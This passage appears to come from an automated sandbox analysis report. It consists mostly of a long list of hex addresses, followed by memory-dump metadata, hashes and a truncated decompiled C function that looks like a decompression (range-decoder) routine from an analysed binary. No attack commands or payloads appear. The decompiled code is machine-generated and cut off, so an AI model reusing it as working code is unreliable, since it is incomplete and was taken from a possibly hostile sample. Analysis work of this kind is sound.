                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406d09
                                                                                                                                                                                                              0x00406d0d
                                                                                                                                                                                                              0x00406d14
                                                                                                                                                                                                              0x00406d17
                                                                                                                                                                                                              0x00406d1a
                                                                                                                                                                                                              0x00406d0f
                                                                                                                                                                                                              0x00406d0f
                                                                                                                                                                                                              0x00406d0f
                                                                                                                                                                                                              0x00406d1d
                                                                                                                                                                                                              0x00406d20
                                                                                                                                                                                                              0x00406d23
                                                                                                                                                                                                              0x00406d23
                                                                                                                                                                                                              0x00406d26
                                                                                                                                                                                                              0x00406d29
                                                                                                                                                                                                              0x00406d2c
                                                                                                                                                                                                              0x00406d2c
                                                                                                                                                                                                              0x00406d2f
                                                                                                                                                                                                              0x00406d36
                                                                                                                                                                                                              0x00406d3b
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406dc9
                                                                                                                                                                                                              0x00406dc9
                                                                                                                                                                                                              0x00406dcd
                                                                                                                                                                                                              0x0040716b
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040716b
                                                                                                                                                                                                              0x00406dd3
                                                                                                                                                                                                              0x00406dd6
                                                                                                                                                                                                              0x00406dd9
                                                                                                                                                                                                              0x00406ddd
                                                                                                                                                                                                              0x00406de0
                                                                                                                                                                                                              0x00406de6
                                                                                                                                                                                                              0x00406de8
                                                                                                                                                                                                              0x00406de8
                                                                                                                                                                                                              0x00406de8
                                                                                                                                                                                                              0x00406deb
                                                                                                                                                                                                              0x00406dee
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004069be
                                                                                                                                                                                                              0x004069be
                                                                                                                                                                                                              0x004069c2
                                                                                                                                                                                                              0x0040712f
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040712f
                                                                                                                                                                                                              0x004069c8
                                                                                                                                                                                                              0x004069cb
                                                                                                                                                                                                              0x004069ce
                                                                                                                                                                                                              0x004069d2
                                                                                                                                                                                                              0x004069d5
                                                                                                                                                                                                              0x004069db
                                                                                                                                                                                                              0x004069dd
                                                                                                                                                                                                              0x004069dd
                                                                                                                                                                                                              0x004069dd
                                                                                                                                                                                                              0x004069e0
                                                                                                                                                                                                              0x004069e3
                                                                                                                                                                                                              0x004069e3
                                                                                                                                                                                                              0x004069e6
                                                                                                                                                                                                              0x004069e9
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004069ef
                                                                                                                                                                                                              0x004069f5
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004069fb
                                                                                                                                                                                                              0x004069fb
                                                                                                                                                                                                              0x004069ff
                                                                                                                                                                                                              0x00406a02
                                                                                                                                                                                                              0x00406a05
                                                                                                                                                                                                              0x00406a08
                                                                                                                                                                                                              0x00406a0b
                                                                                                                                                                                                              0x00406a0c
                                                                                                                                                                                                              0x00406a0f
                                                                                                                                                                                                              0x00406a11
                                                                                                                                                                                                              0x00406a17
                                                                                                                                                                                                              0x00406a1a
                                                                                                                                                                                                              0x00406a1d
                                                                                                                                                                                                              0x00406a20
                                                                                                                                                                                                              0x00406a23
                                                                                                                                                                                                              0x00406a26
                                                                                                                                                                                                              0x00406a29
                                                                                                                                                                                                              0x00406a45
                                                                                                                                                                                                              0x00406a48
                                                                                                                                                                                                              0x00406a4b
                                                                                                                                                                                                              0x00406a4e
                                                                                                                                                                                                              0x00406a55
                                                                                                                                                                                                              0x00406a59
                                                                                                                                                                                                              0x00406a5b
                                                                                                                                                                                                              0x00406a5f
                                                                                                                                                                                                              0x00406a2b
                                                                                                                                                                                                              0x00406a2b
                                                                                                                                                                                                              0x00406a2f
                                                                                                                                                                                                              0x00406a37
                                                                                                                                                                                                              0x00406a3c
                                                                                                                                                                                                              0x00406a3e
                                                                                                                                                                                                              0x00406a40
                                                                                                                                                                                                              0x00406a40
                                                                                                                                                                                                              0x00406a62
                                                                                                                                                                                                              0x00406a69
                                                                                                                                                                                                              0x00406a6c
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406a72
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406a72
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406a77
                                                                                                                                                                                                              0x00406a77
                                                                                                                                                                                                              0x00406a7b
                                                                                                                                                                                                              0x0040713b
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040713b
                                                                                                                                                                                                              0x00406a81
                                                                                                                                                                                                              0x00406a84
                                                                                                                                                                                                              0x00406a87
                                                                                                                                                                                                              0x00406a8b
                                                                                                                                                                                                              0x00406a8e
                                                                                                                                                                                                              0x00406a94
                                                                                                                                                                                                              0x00406a96
                                                                                                                                                                                                              0x00406a96
                                                                                                                                                                                                              0x00406a96
                                                                                                                                                                                                              0x00406a99
                                                                                                                                                                                                              0x00406a9c
                                                                                                                                                                                                              0x00406a9c
                                                                                                                                                                                                              0x00406a9c
                                                                                                                                                                                                              0x00406aa2
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406aa4
                                                                                                                                                                                                              0x00406aa7
                                                                                                                                                                                                              0x00406aaa
                                                                                                                                                                                                              0x00406aad
                                                                                                                                                                                                              0x00406ab0
                                                                                                                                                                                                              0x00406ab3
                                                                                                                                                                                                              0x00406ab6
                                                                                                                                                                                                              0x00406ab9
                                                                                                                                                                                                              0x00406abc
                                                                                                                                                                                                              0x00406abf
                                                                                                                                                                                                              0x00406ac2
                                                                                                                                                                                                              0x00406ada
                                                                                                                                                                                                              0x00406add
                                                                                                                                                                                                              0x00406ae0
                                                                                                                                                                                                              0x00406ae3
                                                                                                                                                                                                              0x00406ae3
                                                                                                                                                                                                              0x00406ae6
                                                                                                                                                                                                              0x00406aea
                                                                                                                                                                                                              0x00406aec
                                                                                                                                                                                                              0x00406ac4
                                                                                                                                                                                                              0x00406ac4
                                                                                                                                                                                                              0x00406acc
                                                                                                                                                                                                              0x00406ad1
                                                                                                                                                                                                              0x00406ad3
                                                                                                                                                                                                              0x00406ad5
                                                                                                                                                                                                              0x00406ad5
                                                                                                                                                                                                              0x00406aef
                                                                                                                                                                                                              0x00406af6
                                                                                                                                                                                                              0x00406af9
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406afb
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406afb
                                                                                                                                                                                                              0x00406af9
                                                                                                                                                                                                              0x00406b00
                                                                                                                                                                                                              0x00406b00
                                                                                                                                                                                                              0x00406b00
                                                                                                                                                                                                              0x00406b00
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406b3b
                                                                                                                                                                                                              0x00406b3b
                                                                                                                                                                                                              0x00406b3f
                                                                                                                                                                                                              0x00407147
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407147
                                                                                                                                                                                                              0x00406b45
                                                                                                                                                                                                              0x00406b48
                                                                                                                                                                                                              0x00406b4b
                                                                                                                                                                                                              0x00406b4f
                                                                                                                                                                                                              0x00406b52
                                                                                                                                                                                                              0x00406b58
                                                                                                                                                                                                              0x00406b5a
                                                                                                                                                                                                              0x00406b5a
                                                                                                                                                                                                              0x00406b5a
                                                                                                                                                                                                              0x00406b5d
                                                                                                                                                                                                              0x00406b60
                                                                                                                                                                                                              0x00406b60
                                                                                                                                                                                                              0x00406b66
                                                                                                                                                                                                              0x00406b04
                                                                                                                                                                                                              0x00406b04
                                                                                                                                                                                                              0x00406b07
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406b07
                                                                                                                                                                                                              0x00406b68
                                                                                                                                                                                                              0x00406b68
                                                                                                                                                                                                              0x00406b6b
                                                                                                                                                                                                              0x00406b6e
                                                                                                                                                                                                              0x00406b71
                                                                                                                                                                                                              0x00406b74
                                                                                                                                                                                                              0x00406b77
                                                                                                                                                                                                              0x00406b7a
                                                                                                                                                                                                              0x00406b7d
                                                                                                                                                                                                              0x00406b80
                                                                                                                                                                                                              0x00406b83
                                                                                                                                                                                                              0x00406b86
                                                                                                                                                                                                              0x00406b9e
                                                                                                                                                                                                              0x00406ba1
                                                                                                                                                                                                              0x00406ba4
                                                                                                                                                                                                              0x00406ba7
                                                                                                                                                                                                              0x00406ba7
                                                                                                                                                                                                              0x00406baa
                                                                                                                                                                                                              0x00406bae
                                                                                                                                                                                                              0x00406bb0
                                                                                                                                                                                                              0x00406b88
                                                                                                                                                                                                              0x00406b88
                                                                                                                                                                                                              0x00406b90
                                                                                                                                                                                                              0x00406b95
                                                                                                                                                                                                              0x00406b97
                                                                                                                                                                                                              0x00406b99
                                                                                                                                                                                                              0x00406b99
                                                                                                                                                                                                              0x00406bb3
                                                                                                                                                                                                              0x00406bba
                                                                                                                                                                                                              0x00406bbd
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406bbf
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406bbf
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406e4c
                                                                                                                                                                                                              0x00406e4c
                                                                                                                                                                                                              0x00406e50
                                                                                                                                                                                                              0x00407177
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407177
                                                                                                                                                                                                              0x00406e56
                                                                                                                                                                                                              0x00406e59
                                                                                                                                                                                                              0x00406e5c
                                                                                                                                                                                                              0x00406e60
                                                                                                                                                                                                              0x00406e63
                                                                                                                                                                                                              0x00406e69
                                                                                                                                                                                                              0x00406e6b
                                                                                                                                                                                                              0x00406e6b
                                                                                                                                                                                                              0x00406e6b
                                                                                                                                                                                                              0x00406e6e
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406c1c
                                                                                                                                                                                                              0x00406c1c
                                                                                                                                                                                                              0x00406c1f
                                                                                                                                                                                                              0x00406f91
                                                                                                                                                                                                              0x00406f91
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407018
                                                                                                                                                                                                              0x0040701c
                                                                                                                                                                                                              0x0040703a
                                                                                                                                                                                                              0x0040703a
                                                                                                                                                                                                              0x0040703a
                                                                                                                                                                                                              0x00407041
                                                                                                                                                                                                              0x00407048
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407048
                                                                                                                                                                                                              0x0040701e
                                                                                                                                                                                                              0x00407021
                                                                                                                                                                                                              0x00407024
                                                                                                                                                                                                              0x00407027
                                                                                                                                                                                                              0x0040702e
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407109
                                                                                                                                                                                                              0x0040710c
                                                                                                                                                                                                              0x0040700d
                                                                                                                                                                                                              0x0040700d
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406d43
                                                                                                                                                                                                              0x00406d45
                                                                                                                                                                                                              0x00406d4c
                                                                                                                                                                                                              0x00406d4d
                                                                                                                                                                                                              0x00406d4f
                                                                                                                                                                                                              0x00406d52
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406d5a
                                                                                                                                                                                                              0x00406d5d
                                                                                                                                                                                                              0x00406d60
                                                                                                                                                                                                              0x00406d62
                                                                                                                                                                                                              0x00406d64
                                                                                                                                                                                                              0x00406d64
                                                                                                                                                                                                              0x00406d65
                                                                                                                                                                                                              0x00406d68
                                                                                                                                                                                                              0x00406d6f
                                                                                                                                                                                                              0x00406d72
                                                                                                                                                                                                              0x00406d80
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407065
                                                                                                                                                                                                              0x00407065
                                                                                                                                                                                                              0x00407069
                                                                                                                                                                                                              0x004071a1
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004071a1
                                                                                                                                                                                                              0x0040706f
                                                                                                                                                                                                              0x00407072
                                                                                                                                                                                                              0x00407075
                                                                                                                                                                                                              0x00407079
                                                                                                                                                                                                              0x0040707c
                                                                                                                                                                                                              0x00407082
                                                                                                                                                                                                              0x00407084
                                                                                                                                                                                                              0x00407084
                                                                                                                                                                                                              0x00407084
                                                                                                                                                                                                              0x00407087
                                                                                                                                                                                                              0x0040708a
                                                                                                                                                                                                              0x0040708a
                                                                                                                                                                                                              0x0040708a
                                                                                                                                                                                                              0x0040708a
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406d88
                                                                                                                                                                                                              0x00406d8b
                                                                                                                                                                                                              0x00406dc1
                                                                                                                                                                                                              0x00406ef1
                                                                                                                                                                                                              0x00406ef1
                                                                                                                                                                                                              0x00406ef1
                                                                                                                                                                                                              0x00406ef1
                                                                                                                                                                                                              0x00406ef4
                                                                                                                                                                                                              0x00406ef4
                                                                                                                                                                                                              0x00406ef7
                                                                                                                                                                                                              0x00406ef9
                                                                                                                                                                                                              0x00407183
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407183
                                                                                                                                                                                                              0x00406eff
                                                                                                                                                                                                              0x00406f02
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406f08
                                                                                                                                                                                                              0x00406f0c
                                                                                                                                                                                                              0x00406f0f
                                                                                                                                                                                                              0x00406f0f
                                                                                                                                                                                                              0x00406f0f
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406f0f
                                                                                                                                                                                                              0x00406d8d
                                                                                                                                                                                                              0x00406d8f
                                                                                                                                                                                                              0x00406d91
                                                                                                                                                                                                              0x00406d93
                                                                                                                                                                                                              0x00406d96
                                                                                                                                                                                                              0x00406d97
                                                                                                                                                                                                              0x00406d99
                                                                                                                                                                                                              0x00406d9b
                                                                                                                                                                                                              0x00406d9e
                                                                                                                                                                                                              0x00406da1
                                                                                                                                                                                                              0x00406db7
                                                                                                                                                                                                              0x00406dbc
                                                                                                                                                                                                              0x00406df4
                                                                                                                                                                                                              0x00406df4
                                                                                                                                                                                                              0x00406df8
                                                                                                                                                                                                              0x00406e24
                                                                                                                                                                                                              0x00406e26
                                                                                                                                                                                                              0x00406e2d
                                                                                                                                                                                                              0x00406e30
                                                                                                                                                                                                              0x00406e33
                                                                                                                                                                                                              0x00406e33
                                                                                                                                                                                                              0x00406e38
                                                                                                                                                                                                              0x00406e38
                                                                                                                                                                                                              0x00406e3a
                                                                                                                                                                                                              0x00406e3d
                                                                                                                                                                                                              0x00406e44
                                                                                                                                                                                                              0x00406e47
                                                                                                                                                                                                              0x00406e74
                                                                                                                                                                                                              0x00406e74
                                                                                                                                                                                                              0x00406e77
                                                                                                                                                                                                              0x00406e7a
                                                                                                                                                                                                              0x00406eee
                                                                                                                                                                                                              0x00406eee
                                                                                                                                                                                                              0x00406eee
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406eee
                                                                                                                                                                                                              0x00406e7c
                                                                                                                                                                                                              0x00406e82
                                                                                                                                                                                                              0x00406e85
                                                                                                                                                                                                              0x00406e88
                                                                                                                                                                                                              0x00406e8b
                                                                                                                                                                                                              0x00406e8e
                                                                                                                                                                                                              0x00406e91
                                                                                                                                                                                                              0x00406e94
                                                                                                                                                                                                              0x00406e97
                                                                                                                                                                                                              0x00406e9a
                                                                                                                                                                                                              0x00406e9d
                                                                                                                                                                                                              0x00406eb6
                                                                                                                                                                                                              0x00406eb8
                                                                                                                                                                                                              0x00406ebb
                                                                                                                                                                                                              0x00406ebc
                                                                                                                                                                                                              0x00406ebf
                                                                                                                                                                                                              0x00406ec1
                                                                                                                                                                                                              0x00406ec4
                                                                                                                                                                                                              0x00406ec6
                                                                                                                                                                                                              0x00406ec8
                                                                                                                                                                                                              0x00406ecb
                                                                                                                                                                                                              0x00406ecd
                                                                                                                                                                                                              0x00406ed0
                                                                                                                                                                                                              0x00406ed4
                                                                                                                                                                                                              0x00406ed6
                                                                                                                                                                                                              0x00406ed6
                                                                                                                                                                                                              0x00406ed7
                                                                                                                                                                                                              0x00406eda
                                                                                                                                                                                                              0x00406edd
                                                                                                                                                                                                              0x00406e9f
                                                                                                                                                                                                              0x00406e9f
                                                                                                                                                                                                              0x00406ea7
                                                                                                                                                                                                              0x00406eac
                                                                                                                                                                                                              0x00406eae
                                                                                                                                                                                                              0x00406eb1
                                                                                                                                                                                                              0x00406eb1
                                                                                                                                                                                                              0x00406ee0
                                                                                                                                                                                                              0x00406ee7
                                                                                                                                                                                                              0x00406e71
                                                                                                                                                                                                              0x00406e71
                                                                                                                                                                                                              0x00406e71
                                                                                                                                                                                                              0x00406e71
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406ee9
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406ee9
                                                                                                                                                                                                              0x00406ee7
                                                                                                                                                                                                              0x00406dfa
                                                                                                                                                                                                              0x00406dfd
                                                                                                                                                                                                              0x00406dff
                                                                                                                                                                                                              0x00406e02
                                                                                                                                                                                                              0x00406e05
                                                                                                                                                                                                              0x00406e08
                                                                                                                                                                                                              0x00406e0a
                                                                                                                                                                                                              0x00406e0d
                                                                                                                                                                                                              0x00406e10
                                                                                                                                                                                                              0x00406e10
                                                                                                                                                                                                              0x00406e13
                                                                                                                                                                                                              0x00406e13
                                                                                                                                                                                                              0x00406e16
                                                                                                                                                                                                              0x00406e1d
                                                                                                                                                                                                              0x00406df1
                                                                                                                                                                                                              0x00406df1
                                                                                                                                                                                                              0x00406df1
                                                                                                                                                                                                              0x00406df1
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406e1f
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406e1f
                                                                                                                                                                                                              0x00406e1d
                                                                                                                                                                                                              0x00406da3
                                                                                                                                                                                                              0x00406da6
                                                                                                                                                                                                              0x00406da8
                                                                                                                                                                                                              0x00406dab
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406b0a
                                                                                                                                                                                                              0x00406b0a
                                                                                                                                                                                                              0x00406b0e
                                                                                                                                                                                                              0x00407153
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407153
                                                                                                                                                                                                              0x00406b14
                                                                                                                                                                                                              0x00406b17
                                                                                                                                                                                                              0x00406b1a
                                                                                                                                                                                                              0x00406b1d
                                                                                                                                                                                                              0x00406b20
                                                                                                                                                                                                              0x00406b23
                                                                                                                                                                                                              0x00406b26
                                                                                                                                                                                                              0x00406b28
                                                                                                                                                                                                              0x00406b2b
                                                                                                                                                                                                              0x00406b2e
                                                                                                                                                                                                              0x00406b31
                                                                                                                                                                                                              0x00406b33
                                                                                                                                                                                                              0x00406b33
                                                                                                                                                                                                              0x00406b33
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406c95
                                                                                                                                                                                                              0x00406c95
                                                                                                                                                                                                              0x00406c99
                                                                                                                                                                                                              0x0040715f
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040715f
                                                                                                                                                                                                              0x00406c9f
                                                                                                                                                                                                              0x00406ca2
                                                                                                                                                                                                              0x00406ca5
                                                                                                                                                                                                              0x00406ca8
                                                                                                                                                                                                              0x00406caa
                                                                                                                                                                                                              0x00406caa
                                                                                                                                                                                                              0x00406caa
                                                                                                                                                                                                              0x00406cad
                                                                                                                                                                                                              0x00406cb0
                                                                                                                                                                                                              0x00406cb3
                                                                                                                                                                                                              0x00406cb6
                                                                                                                                                                                                              0x00406cb9
                                                                                                                                                                                                              0x00406cbc
                                                                                                                                                                                                              0x00406cbd
                                                                                                                                                                                                              0x00406cbf
                                                                                                                                                                                                              0x00406cbf
                                                                                                                                                                                                              0x00406cbf
                                                                                                                                                                                                              0x00406cc2
                                                                                                                                                                                                              0x00406cc5
                                                                                                                                                                                                              0x00406cc8
                                                                                                                                                                                                              0x00406ccb
                                                                                                                                                                                                              0x00406ccb
                                                                                                                                                                                                              0x00406ccb
                                                                                                                                                                                                              0x00406cce
                                                                                                                                                                                                              0x00406cd0
                                                                                                                                                                                                              0x00406cd0
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406f12
                                                                                                                                                                                                              0x00406f12
                                                                                                                                                                                                              0x00406f12
                                                                                                                                                                                                              0x00406f16
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406f1c
                                                                                                                                                                                                              0x00406f1f
                                                                                                                                                                                                              0x00406f22
                                                                                                                                                                                                              0x00406f25
                                                                                                                                                                                                              0x00406f27
                                                                                                                                                                                                              0x00406f27
                                                                                                                                                                                                              0x00406f27
                                                                                                                                                                                                              0x00406f2a
                                                                                                                                                                                                              0x00406f2d
                                                                                                                                                                                                              0x00406f30
                                                                                                                                                                                                              0x00406f33
                                                                                                                                                                                                              0x00406f36
                                                                                                                                                                                                              0x00406f39
                                                                                                                                                                                                              0x00406f3a
                                                                                                                                                                                                              0x00406f3c
                                                                                                                                                                                                              0x00406f3c
                                                                                                                                                                                                              0x00406f3c
                                                                                                                                                                                                              0x00406f3f
                                                                                                                                                                                                              0x00406f42
                                                                                                                                                                                                              0x00406f45
                                                                                                                                                                                                              0x00406f48
                                                                                                                                                                                                              0x00406f4b
                                                                                                                                                                                                              0x00406f4f
                                                                                                                                                                                                              0x00406f51
                                                                                                                                                                                                              0x00406f54
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406f56
                                                                                                                                                                                                              0x00406cd3
                                                                                                                                                                                                              0x00406cd3
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406cd3
                                                                                                                                                                                                              0x00406f54
                                                                                                                                                                                                              0x00407189
                                                                                                                                                                                                              0x004071ab
                                                                                                                                                                                                              0x004071b1
                                                                                                                                                                                                              0x004071b3
                                                                                                                                                                                                              0x004071ba
                                                                                                                                                                                                              0x004071bc
                                                                                                                                                                                                              0x004071c3
                                                                                                                                                                                                              0x004071c7
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004067b8
                                                                                                                                                                                                              0x004071c0
                                                                                                                                                                                                              0x004071c0
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004071c0
                                                                                                                                                                                                              0x0040700d
                                                                                                                                                                                                              0x00407093
                                                                                                                                                                                                              0x00407099
                                                                                                                                                                                                              0x0040709c
                                                                                                                                                                                                              0x0040709f
                                                                                                                                                                                                              0x004070a2
                                                                                                                                                                                                              0x004070a5
                                                                                                                                                                                                              0x004070a8
                                                                                                                                                                                                              0x004070ab
                                                                                                                                                                                                              0x004070ae
                                                                                                                                                                                                              0x004070b4
                                                                                                                                                                                                              0x004070cd
                                                                                                                                                                                                              0x004070d0
                                                                                                                                                                                                              0x004070d3
                                                                                                                                                                                                              0x004070d6
                                                                                                                                                                                                              0x004070da
                                                                                                                                                                                                              0x004070dc
                                                                                                                                                                                                              0x004070dd
                                                                                                                                                                                                              0x004070e0
                                                                                                                                                                                                              0x004070b6
                                                                                                                                                                                                              0x004070b6
                                                                                                                                                                                                              0x004070be
                                                                                                                                                                                                              0x004070c3
                                                                                                                                                                                                              0x004070c5
                                                                                                                                                                                                              0x004070c8
                                                                                                                                                                                                              0x004070c8
                                                                                                                                                                                                              0x004070ea
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004070ec
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004070ec
                                                                                                                                                                                                              0x004070ea
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406f5f

                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 76451a61548a05875e54a201c0622e54c4b3ee1b55beed09f1cff06290f44a2f
                                                                                                                                                                                                              • Instruction ID: 66e4c3ae890465860883969c5b36e42f4395a0ef1606ee2efde14a16b44166c2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 76451a61548a05875e54a201c0622e54c4b3ee1b55beed09f1cff06290f44a2f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9913171D04229CBDF28CF98C8447ADBBB1FF44305F14816AD856BB281C778AA86DF45
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 98%
                                                                                                                                                                                                              			E00406C71() {
                                                                                                                                                                                                              				unsigned short _t532;
                                                                                                                                                                                                              				signed int _t533;
                                                                                                                                                                                                              				void _t534;
                                                                                                                                                                                                              				void* _t535;
                                                                                                                                                                                                              				signed int _t536;
                                                                                                                                                                                                              				signed int _t565;
                                                                                                                                                                                                              				signed int _t568;
                                                                                                                                                                                                              				signed int _t589;
                                                                                                                                                                                                              				signed int* _t606;
                                                                                                                                                                                                              				void* _t613;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				L0:
                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                              					L0:
                                                                                                                                                                                                              					if( *(_t613 - 0x40) != 0) {
                                                                                                                                                                                                              						L89:
                                                                                                                                                                                                              						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                                                                                                                                                                                                              						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                                                                                                                                                                                                              						L69:
                                                                                                                                                                                                              						_t606 =  *(_t613 - 0x58);
                                                                                                                                                                                                              						 *(_t613 - 0x84) = 0x12;
                                                                                                                                                                                                              						L132:
                                                                                                                                                                                                              						 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                                              						L133:
                                                                                                                                                                                                              						_t532 =  *_t606;
                                                                                                                                                                                                              						_t589 = _t532 & 0x0000ffff;
                                                                                                                                                                                                              						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                                                                                                              						if( *(_t613 - 0xc) >= _t565) {
                                                                                                                                                                                                              							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                                                                                                              							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                                                                                                              							 *(_t613 - 0x40) = 1;
                                                                                                                                                                                                              							_t533 = _t532 - (_t532 >> 5);
                                                                                                                                                                                                              							 *_t606 = _t533;
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							 *(_t613 - 0x10) = _t565;
                                                                                                                                                                                                              							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                                                                                                              							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              							L139:
                                                                                                                                                                                                              							_t534 =  *(_t613 - 0x84);
                                                                                                                                                                                                              							L140:
                                                                                                                                                                                                              							 *(_t613 - 0x88) = _t534;
                                                                                                                                                                                                              							goto L1;
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							L137:
                                                                                                                                                                                                              							if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                                                              								 *(_t613 - 0x88) = 5;
                                                                                                                                                                                                              								goto L170;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                                                                                                                                              							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                                                              							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                                                              							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              							goto L139;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						if( *(__ebp - 0x60) == 0) {
                                                                                                                                                                                                              							L171:
                                                                                                                                                                                                              							_t536 = _t535 | 0xffffffff;
                                                                                                                                                                                                              							L172:
                                                                                                                                                                                                              							return _t536;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						__eax = 0;
                                                                                                                                                                                                              						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                                                                                                              						0 | _t258 = _t258 + _t258 + 9;
                                                                                                                                                                                                              						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                                                                                                                                              						L75:
                                                                                                                                                                                                              						if( *(__ebp - 0x64) == 0) {
